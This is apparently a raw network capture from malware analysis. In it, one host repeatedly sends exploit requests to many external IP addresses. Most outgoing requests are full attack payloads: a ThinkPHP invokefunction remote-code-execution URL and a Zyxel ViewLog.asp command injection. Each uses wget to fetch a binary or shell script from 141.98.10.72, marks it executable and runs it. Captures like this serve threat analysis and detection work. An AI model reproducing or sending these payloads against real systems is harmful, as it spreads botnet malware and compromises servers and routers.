Feb 14, 2024 09:29:51.636704922 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:29:51 GMT Date: Wed, 14 Feb 2024 08:29:51 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 35 62 30 66 37 34 38 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 31 26 23 34 36 3b 34 62 36 35 66 34 66 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.d5b0f748.1707899391.4b65f4f1</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
423	192.168.2.15	45228	95.101.200.97	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:51.448153019 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:51.653476954 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 14 Feb 2024 08:29:51 GMT Date: Wed, 14 Feb 2024 08:29:51 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 66 30 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 31 26 23 34 36 3b 32 37 38 64 64 31 66 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.ef01002.1707899391.278dd1fb</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
424	192.168.2.15	55706	88.98.53.196	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:51.454163074 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:52.569446087 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:53.885410070 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:56.505330086 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:01.881171942 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:12.376857042 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:35.160269976 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:18.166987896 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
425	192.168.2.15	48516	95.100.189.25	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:51.661319017 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:51.886717081 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 14 Feb 2024 08:29:51 GMT Date: Wed, 14 Feb 2024 08:29:51 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 37 64 31 66 35 35 37 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 31 26 23 34 36 3b 31 30 32 36 30 66 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.a7d1f557.1707899391.10260f6</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
426	192.168.2.15	52334	94.111.57.215	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:52.439925909 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
427	192.168.2.15	45306	31.136.130.133	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:52.662767887 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:53.337446928 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:54.713449955 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:57.529315948 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:03.161195993 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:14.168926954 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:37.208270073 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:22.263025045 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
428	192.168.2.15	50274	85.160.68.184	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:52.669883013 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
429	192.168.2.15	52804	31.200.124.144	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:52.688689947 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
430	192.168.2.15	47290	94.120.145.111	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:52.688878059 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
431	192.168.2.15	54700	95.86.75.229	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:52.697118044 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
432	192.168.2.15	59280	85.61.178.11	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:52.889579058 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:53.117610931 CET	254	IN	HTTP/1.0 302 Found Server: httpd Date: Wed, 14 Feb 2024 08:29:59 GMT Location: index.htm Pragma: no-cache Cache-Control: no-cache,no-store,must-revalidate, post-check=0,pre-check=0 Expires: 0 CONTENT-LANGUAGE: en Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
433	192.168.2.15	57274	94.123.41.57	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:52.917318106 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
434	192.168.2.15	36190	31.200.93.100	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:52.936582088 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
435	192.168.2.15	59298	85.61.178.11	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:53.323064089 CET	290	IN	HTTP/1.0 400 Bad Request Server: httpd Date: Wed, 14 Feb 2024 08:29:59 GMT Content-Type: text/html CONTENT-LANGUAGE: en Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
436	192.168.2.15	39986	112.124.165.108	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:54.239906073 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:54.610196114 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:32:08 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
437	192.168.2.15	38298	31.136.82.118	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:54.423353910 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:55.097393036 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
